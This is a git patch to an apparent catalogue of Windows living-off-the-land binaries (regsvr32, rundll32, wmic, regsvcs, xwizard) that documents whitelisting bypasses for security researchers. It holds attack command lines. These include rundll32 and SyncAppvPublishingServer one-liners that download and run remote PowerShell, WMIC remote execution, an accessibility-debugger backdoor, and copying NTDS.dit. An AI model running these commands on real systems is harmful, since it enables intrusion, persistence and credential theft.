From 610e5d7607d1d82d57939f59d5b8cbbef734dda7 Mon Sep 17 00:00:00 2001 From: api0cradle Date: Wed, 18 Apr 2018 23:45:36 +0200 Subject: [PATCH] Added some more adjustments --- OSBinaries/Installutil.md | 6 +-- OSBinaries/Msdt.md | 2 +- OSBinaries/Payload/Regsvr32_calc.sct | 23 +++++++++++ OSBinaries/Payload/Wmic_calc.xsl | 11 ++++++ OSBinaries/Regasm.md | 5 ++- OSBinaries/Regsvcs.md | 27 +++++++++++-- OSBinaries/Regsvr32.md | 24 +++++++++++- OSBinaries/Rundll32.md | 25 +++++++++++- OSBinaries/Runscripthelper.md | 18 +++++++++ OSBinaries/Syncappvpublishingserver.md | 18 +++++++++ OSBinaries/Wmic.md | 54 ++++++++++++++++++++++---- OSBinaries/Xwizard.md | 24 +++++++++++- 12 files changed, 216 insertions(+), 21 deletions(-) create mode 100644 OSBinaries/Payload/Regsvr32_calc.sct create mode 100644 OSBinaries/Payload/Wmic_calc.xsl diff --git a/OSBinaries/Installutil.md b/OSBinaries/Installutil.md index 79cf11b..2c94fdf 100644 --- a/OSBinaries/Installutil.md +++ b/OSBinaries/Installutil.md @@ -11,8 +11,8 @@ Acknowledgements: Code sample: -* [AllTheThingsX64.dll - Atomic Red Team](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx64.dll) -* [AllTheThingsX32.dll - Atomic Red Team](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx32.dll) +* [AllTheThingsX64.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx64.dll)[1] +* [AllTheThingsX32.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx32.dll)[1] Resources: * https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/ @@ -31,7 +31,7 @@ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe ``` Notes: - +[1]Code sample linked to Red Canary - Atomic Red Team diff --git a/OSBinaries/Msdt.md b/OSBinaries/Msdt.md index ef22dc7..b1ae961 100644 --- a/OSBinaries/Msdt.md +++ b/OSBinaries/Msdt.md @@ -10,7 +10,7 @@ Acknowledgements: * ? Code sample: -* [NameOfLink](Payload/NameOfPayload) +* Resources: * https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/ diff --git a/OSBinaries/Payload/Regsvr32_calc.sct b/OSBinaries/Payload/Regsvr32_calc.sct new file mode 100644 index 0000000..74a556e --- /dev/null +++ b/OSBinaries/Payload/Regsvr32_calc.sct @@ -0,0 +1,23 @@ + + + + + + + + + + + + + + \ No newline at end of file diff --git a/OSBinaries/Payload/Wmic_calc.xsl b/OSBinaries/Payload/Wmic_calc.xsl new file mode 100644 index 0000000..b405524 --- /dev/null +++ b/OSBinaries/Payload/Wmic_calc.xsl @@ -0,0 +1,11 @@ + + + + + + \ No newline at end of file diff --git a/OSBinaries/Regasm.md b/OSBinaries/Regasm.md index ff15468..5684cb9 100644 --- a/OSBinaries/Regasm.md +++ b/OSBinaries/Regasm.md @@ -3,14 +3,15 @@ * Functions: Execute ``` -regasm.exe /U AllTheThings.dll +regasm.exe /U AllTheThingsx64.dll ``` Acknowledgements: * Casey Smith - @subtee Code sample: -* [AllTheThingsx64.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx64.dll)[1] +* [AllTheThingsx64.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx64.dll)[1] +* [AllTheThingsx86.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx86.dll)[1] Resources: * https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/ diff --git a/OSBinaries/Regsvcs.md b/OSBinaries/Regsvcs.md index a638b9b..f631000 100644 --- a/OSBinaries/Regsvcs.md +++ b/OSBinaries/Regsvcs.md @@ -3,10 +3,29 @@ * Functions: Execute ``` -regsvcs.exe /U regsvcs.dll - -regsvcs.exe regsvcs.dll +regsvcs.exe AllTheThingsx64.dll ``` Acknowledgements: -* Casey Smith - @subtee \ No newline at end of file +* Casey Smith - @subtee + +Code sample: +* [AllTheThingsx64.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx64.dll)[1] +* [AllTheThingsx86.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx86.dll)[1] + +Resources: +* https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/ +* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs +* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/RegsvcsRegasm.md +* https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ + +Full path: +``` +C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe +C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe +C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe +C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe +``` + +Notes: +[1]Code sample linked to Red Canary - Atomic Red Team \ No newline at end of file diff --git a/OSBinaries/Regsvr32.md b/OSBinaries/Regsvr32.md index 95caa19..0152c5b 100644 --- a/OSBinaries/Regsvr32.md +++ b/OSBinaries/Regsvr32.md @@ -3,11 +3,33 @@ * Functions: Execute ``` -regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll +regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll + +regsvr32.exe /s /u /i:file.sct scrobj.dll ``` Acknowledgements: * Casey Smith - @subtee +Code sample: +* [Regsvr32_calc.sct](Payload/Regsvr32_calc.sct)[1] + +Resources: +* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Regsvr32.md +* https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ +* https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/ + +Full path: +``` +C:\Windows\System32\regsvr32.exe +C:\Windows\SysWOW64\regsvr32.exe +``` + +Notes: +[1]Code sample linked to Red Canary - Atomic Red Team + + + + \ No newline at end of file diff --git a/OSBinaries/Rundll32.md b/OSBinaries/Rundll32.md index ef8047c..7adb1ca 100644 --- a/OSBinaries/Rundll32.md +++ b/OSBinaries/Rundll32.md @@ -3,6 +3,8 @@ * Functions: Execute ``` +rundll32.exe AllTheThingsx64,EntryPoint + rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');" rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()"); @@ -37,6 +39,27 @@ Acknowledgements: * Jimmy - @bohops * Moriarty - @Moriarty_Meng * Adam - @hexacorn - + +Code sample: +* [AllTheThingsx64.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx64.dll)[1] +* [AllTheThingsx86.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx86.dll)[1] + +Resources: +* https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/ +* https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7 +* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Rundll32.md +* https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ + +Full path: +``` +C:\Windows\System32\rundll32.exe +C:\Windows\SysWOW64\rundll32.exe +``` + +Notes: +[1]Code sample linked to Red Canary - Atomic Red Team + + + \ No newline at end of file diff --git a/OSBinaries/Runscripthelper.md b/OSBinaries/Runscripthelper.md index eb0a89d..e3f56ad 100644 --- a/OSBinaries/Runscripthelper.md +++ b/OSBinaries/Runscripthelper.md @@ -9,4 +9,22 @@ runscripthelper.exe surfacecheck \\?\C:\Test\Microsoft\Diagnosis\scripts\test.tx Acknowledgements: * Matt Graeber - @mattifestation +Code sample: +* + +Resources: +* https://posts.specterops.io/bypassing-application-whitelisting-with-runscripthelper-exe-1906923658fc + +Full path: +``` +C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe +C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe +``` + +Notes: + + + + + \ No newline at end of file diff --git a/OSBinaries/Syncappvpublishingserver.md b/OSBinaries/Syncappvpublishingserver.md index 3278893..08e8a5b 100644 --- a/OSBinaries/Syncappvpublishingserver.md +++ b/OSBinaries/Syncappvpublishingserver.md @@ -8,3 +8,21 @@ SyncAppvPublishingServer.exe "n;((New-Object Net.WebClient).DownloadString('http Acknowledgements: * Nick Landers - @monoxgas + +Code sample: +* + +Resources: +* https://twitter.com/monoxgas/status/895045566090010624 + +Full path: +``` +C:\Windows\System32\SyncAppvPublishingServer.exe +``` + +Notes: +Command injection into PowerShell +Might have been fixed in newest version of Windows 10. + + + diff --git a/OSBinaries/Wmic.md b/OSBinaries/Wmic.md index b8740a0..e3053e6 100644 --- a/OSBinaries/Wmic.md +++ b/OSBinaries/Wmic.md @@ -1,16 +1,56 @@ ## WMIC.exe -* Functions: Execute +* Functions: Reconnaissance, Execute, Read ADS ``` -wmic process call create calc +wmic process call create calc -wmic process get brief /format:"https://www.example.com/file.xsl - -wmic os get /format:"MYXSLFILE.xsl" - -wmic process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl" +wmic process call create '"c:\ads\file.txt:program.exe"' + +wmic useraccount get /ALL + +wmic process get caption,executablepath,commandline + +wmic qfe get description,installedOn /format:csv + +wmic /node:"192.168.0.1" service where (caption like "%sql server (%") + +get-wmiobject –class "win32_share" –namespace "root\CIMV2" –computer "targetname" + +wmic /user: /password: /node: process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f" + +wmic /NODE: "192.168.0.1" process call create "evil.exe" + +wmic /node:REMOTECOMPUTERNAME PROCESS call create "at 9:00PM c:\GoogleUpdate.exe ^> c:\notGoogleUpdateResults.txt" + +wmic /node:REMOTECOMPUTERNAME PROCESS call create "cmd /c vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit > c:\not_the_NTDS.dit" + +wmic process get brief /format:"https://www.example.com/file.xsl" + +wmic os get /format:"MYXSLFILE.xsl" + +wmic process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl" ``` Acknowledgements: * Casey Smith - @subtee + +Code sample: +* [Wmic_calc.xsl](Payloads/Wmic_calc.xls) + +Resources: +* https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory +* https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html +* https://twitter.com/subTee/status/986234811944648707 + +Full path: +``` +c:\windows\system32\wbem\wmic.exe +c:\windows\sysWOW64\wbem\wmic.exe +``` + +Notes: + + + + diff --git a/OSBinaries/Xwizard.md b/OSBinaries/Xwizard.md index 61754eb..1d9090a 100644 --- a/OSBinaries/Xwizard.md +++ b/OSBinaries/Xwizard.md @@ -3,8 +3,28 @@ * Functions: DLL hijack ``` -xwizard.exe (xwizard.dll in same folder) +xwizard.exe ``` Acknowledgements: -* Adam - @Hexacorn \ No newline at end of file +* Adam - @Hexacorn + +Code sample: +* + +Resources: +* http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/ + +Full path: +``` +c:\windows\system32\xwizard.exe +c:\windows\sysWOW32\xwizard.exe +``` + +Notes: +Need to copy out xwizard.exe to a user controlled folder. +If you add your own version of xwizard.dll it will execute when you start xwizard.exe. + + + +